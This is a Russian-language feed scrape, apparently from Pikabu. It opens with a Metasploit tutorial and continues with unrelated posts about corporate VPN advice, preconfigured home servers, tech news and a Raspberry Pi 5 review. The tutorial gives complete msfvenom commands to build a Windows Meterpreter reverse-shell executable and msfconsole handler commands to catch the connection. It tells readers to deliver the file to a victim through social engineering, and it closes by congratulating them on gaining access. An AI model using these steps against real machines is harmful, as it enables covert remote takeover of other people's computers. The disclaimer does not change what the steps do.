Metasploit
Metasploit Framework - это мощный инструмент, который может быть использован как злоумышленниками, так и этичными хакерами и специалистами по тестированию на проникновение для исследования уязвимостей в сетях и на серверах.
Проект Metasploit был создан на языке Perl в 2003 году Эйч Ди Муром (H.D. Moore) при содействии основного разработчика Мэтта Миллера для использования в качестве портативного сетевого инструмента. Он был полностью переведен на язык Ruby к 2007 году, а в 2009 году лицензию приобрела Rapid7, и теперь этот инструмент остается частью ассортимента этой компании, специализирующейся на разработке систем обнаружения вторжений и инструментов эксплуатации уязвимостей систем удаленного доступа.
Этот фреймворк стал основным инструментом разработки эксплойтов. До Metasploit пентестерам приходилось выполнять все проверки вручную, используя различные инструменты, которые могли поддерживать или не поддерживать тестируемую платформу, а также вручную писать собственный код для эксплуатации уязвимостей.
Основными компонентами инструмента являются эксплойты и пэйлоады.
Эксплойт - это код, который эксплуатирует ошибку, неверную настройку или системный сбой — любую брешь в защите. Эксплойт помогает найти ее, а потом воспользоваться, чтобы получить контроль над целевой системой. Создавать эксплойты лучше самостоятельно, но с Metasploit это быстрее и проще. Во фреймворке есть образцы готового кода.
Пэйлоады. Когда эксплойт получает доступ к системе, выполняется определенный код. Его называют пэйлоадом, или полезной нагрузкой. Обычно это шелл-код — команды, написанные на языке оболочки операционной системы, то есть для консоли ОС. Пэйлоад нужен, чтобы установить соединение, запустить вредоносный код или выполнить другую операцию.
Дополнительные модули Metasploit позволяют просканировать сеть и проанализировать трафик, который через нее идет. Это необходимо на начальном этапе атаки — так пентестер получает информацию, нужную для проникновения.
В состав фреймворка входят:
библиотеки — в первую очередь библиотека Rex для основных операций. На ней базируются другие — MSF Core и MSF Base. Вместе они составляют основное ядро команд Metasploit;
модули — эксплойты, пэйлоады и прочие, о которых рассказывали выше;
инструменты — дополнительное ПО для работы;
вспомогательные плагины;
интерфейсы — то, с помощью чего пользователь взаимодействует с Metasploit. По умолчанию это доступ через консоль или CLI — консольное приложение. Можно установить или настроить графический интерфейс.
MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл.
Reverse TCP (обратное подключение, обратный шелл, пэйлоад) — схема взаимодействия с целевым компьютером. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или обратный шелл.
Чтобы узнать, какие полезные нагрузки доступны введите команду:
msfvenom -l payloads
Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter.
LHOST — IP-адрес вашего компьютера (атакующего).
LPORT — порт вашего компьютера, который назначен серверу или программе.
P — сокращение от «payload», полезная нагрузка для выбранной платформы.
F — параметр, который задает тип файла, например, exe для Windows.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o payload.exe
Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды:
msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.13
msf> set LPORT 4444
msf> run
Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.
После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла.
После запуска созданного файла откроется сессия Meterpreter:
Поздравляю, вы получили доступ к компьютеру.
Информация предоставлена для информационных целей.
Посоветуйте ВПН (не обход блокировок)
Друзья, нужен совет. Сотрудникам нужен доступ к корпоративной сети. Сейчас работают через OpenVPN или WG. Но меня заебало мне надоело настраивать впн и объяснять каждому что надо нажимать сюда, а потом сюда.
Чего хочу: Было бы идеально что-то типа radminvpn но на своем сервере. Что бы служба стартовала сама вместе с системой. Сейчас смотрю автозапуск OpenVPN, но результатами пока недоволен. Буду благодарен за любые конструктивные советы.
Говорят, если гуманитарий пройдет это головоломку до конца, он может считать себя технарем
А еще получит ачивку в профиль. Рискнете?
Нужны ли готовые сервера с ПО?
Приветствую Пикабушников!
Наша компания прорабатывает вопрос производства домашних серверов на базе восстановленных (б/у) материнских плат и процессоров (кроме процессора, материнской платы и ОЗУ все комплектующие новые). "Пробный шар" (он же "первый блин комом") уже собран, аппаратно протестирован, зеленкой замазаны набитые 100500 шишек (шутка, так... разок споткнулись).
Сразу скажу, что это надежно. По заказам клиентов мы собрали уже довольно много таких серверов в т.ч. оба наших основных сервера собраны именно на таком железе. Первые сервера отработали уже более 4-х лет, полёт нормальный. Безусловно в крупные компании такие сервера не пойдут по разным причинам, но для сегментов домашнего использования и малого бизнеса их возможностей более чем достаточно.
Прежде всего в таких сборках подкупает цена, потому что итоговый ценник за весь сервер получился ниже, чем просто новый процессор и материнская плата. Сборка из восстановленных запчастей связана так же и с тем, что со 2 квартала 2022 года у нас и наших друзей довольно часто возникают сомнения в том, что новые комплектующие действительно новые. Здесь мы сразу говорим, что новое, а что - нет.
Хвастаться аппаратной частью серверов и нашими техническими решениями будем в видео (и чуть позже). Сразу отмечу, что проектировали и подбирали комплектующие долго, отрабатывая огромное число разных нюансов в эксплуатации и закладывая в сервера большой потенциал возможных модернизаций.
Предустановленная ОС на сервере естественно из семейства Linux ;-)
Целевая аудитория - малый бизнес (до 20 - 25 пользователей на сервер) и физические лица.
Концепция проекта - сервер в формате "включил и пользуйся" т.е. из коробки установлена ОС и ряд сервисов.
Мы сперва подумали сами, что может быть интересно нашим клиентам, но потом поняли, что лучше не думать за других, а просто спросить:
Если бы вы покупали сервер с предустановленными и настроенными сервисами, то что бы вы хотели там видеть?
Естественно, что пользователь потом сможет поставить что угодно. Более того - потихоньку пишется и тестируется наш "магазин приложений" и SDK, чтобы этот "магазин" можно было быстро наполнять. Слово "магазин" в кавычках не просто так, потому что решение не классический магазин приложений, но ближе к этому понятия на текущий момент нет.
У команды есть опыт в развертывании огромного числа решений, поэтому мы можем предустановить в сервер почти всё что угодно (за исключением того, что по закону ставить нельзя). Что мы выбрали сами - пока не скажем, чтобы не повлиять на результат опроса.
P.S. Перед публикацией на Пикабу мы поспрашивали знакомых. Сразу отвечу на наиболее часто задаваемый вопрос - 1С и КриптоПРО (даже ознакомительные версии) устанавливать нельзя. Мы уже спрашивали об эотм у правообладателей и получили официальный ответ с запретом.
Куда пойти скуфу 40 лет?
В эскорт или в IT?
7 за 1.24 Линус критикует Google
Продолжаем эксперимент
Линус Торвальдс раскритиковал предложение Google по ядру Linux, посчитав его ненужным усложнением. Он призвал Google искать более умные решения, не перегружая разработчиков ядра. Торвальдс против идеи Google автоматически помечать потенциальные переполнения в коде C.
Sony убрала игры Helldivers 2 и Ghost of Tsushima из Steam в 180 странах из-за PSN (в этих странах он не работает). Во всем виновата привязка к региону. За призрака вернули деньги
Продолжаем про адских десантников. Комьюнити-менеджер Helldivers 2, Spitz, уволен после призывов к ревью-бомбингу игры в ответ на требование Sony привязать аккаунты PSN.
ИИ-генератор изображений для Commodore 64: ретро-арты за 20 минут. Прикольно
Bulk Crap Uninstaller 5.8: бесплатный деинсталлятор для Windows.
Starlink станет прибыльным в 2024 году, прогнозирует Quilty Space. По оценкам аналитиков, доходы увеличатся до $6,6 млрд по итогам 2024 года — рост в два раза по отношению к 2023 году. Четыре года до этого Starlink вовсе не имел доходности.
Пользователю Asus предложили ремонт RTX 4090 за $3758 из-за царапины.RTX 4090 ROG STRIX WHITE OC стоит$ 2800.
Вот и все новости на 12.05
Спокойной ночи :3
Как подготовить машину к долгой поездке
Взять с собой побольше вкусняшек, запасное колесо и знак аварийной остановки. А что сделать еще — посмотрите в нашем чек-листе. Бонусом — маршруты для отдыха, которые можно проехать даже в плохую погоду.
Raspberry pi 5, часть 1. Особенности, первый запуск, удалённое управление через rpi-connect
Raspberry pi 5, часть 1
rpi5
Протестируем работу Raspberry pi 5, посмотрим особенности, а также проверим возможность удалённого управления интерфейсом. Тема нам интересна, ранее у нас были эксперименты с ARM, в начале канала описаны первые шаги.
rpi-connect
Сразу отметим, что для полноценной работы rpi5 требуется мощный блок питания на 5А. В нашем случае на блоке питания на 3А rpi5 работала, но на рабочем столе всё время "сигналила". В реальности потребление было меньше, естественно, без подключения других компонент, только вентилятор:
psu
warning
(!) Для информации: на Али китайские коллеги часто продают абсолютно не подходящие по параметрам блоки питания, перед покупкой читайте комментарии.
По параметрам rpi5 превосходит rpi4 раза в 2: новый процессор, память, видео, поддержка быстрых дисков etc. Также есть приятные мелочи - кнопка включения; она работает так - при подключении питания rpi5 включается сама, далее выключить/включить можно с кнопки.
working
Нагревается rpi5 прилично, поэтому ставить радиатор+вентилятор обязательно, об этом мы говорили ранее:
cooling
Справедливости ради отметим, что управление охлаждением осуществляется автоматически, вентилятор включается сам при нагрузке, при простое он иногда выключается совсем. Это удобно, когда нужна нешумная плата.
Для проверки rpi-connect нужна десктопная версия системы:
Raspberry PI Imager
После установки плата автоматически перезагружается несколько раз. Честно сказать, десктопной версией мы пользовались всего несколько раз. Тут ничего особенного нет. Советуем при запуске Raspberry PI Imager настроить:
логин/пароль пользователя
подключение к своей точке доступа, если нет кабельного подключения
включить ssh-сервер
Для проверки rpi-connect нужно обновить пакеты, ОС и установить пакет с последующей перезагрузкой:
sudo apt install rpi-connect
Все действия по настройке rpi-connect сделать только через консоль не получится.
Регистрация на сайте нужна (им для учёта нас) для возможности удалённого входа по логину/паролю из любого браузера. Ресурс для входа будет вида:
rpi-connect
Производитель ПО утверждает, что соединение производится peer-to-peer. Мы при работе из браузера наблюдали торможение, "шлейф" при ресайзе окон, иногда при наборе текста.
Наши выводы:
rpi5 - достаточно мощная плата, позже мы еще ещё постестируем её возможности
охлаждение и блоки питания - важные составляющие, на этом экономить нельзя
функция rpi-connect (beta) интересна, но пока притормаживает. Если нужно просто удалённо управлять платой с графической оболочкой - используйте. Нам пока хватает ssh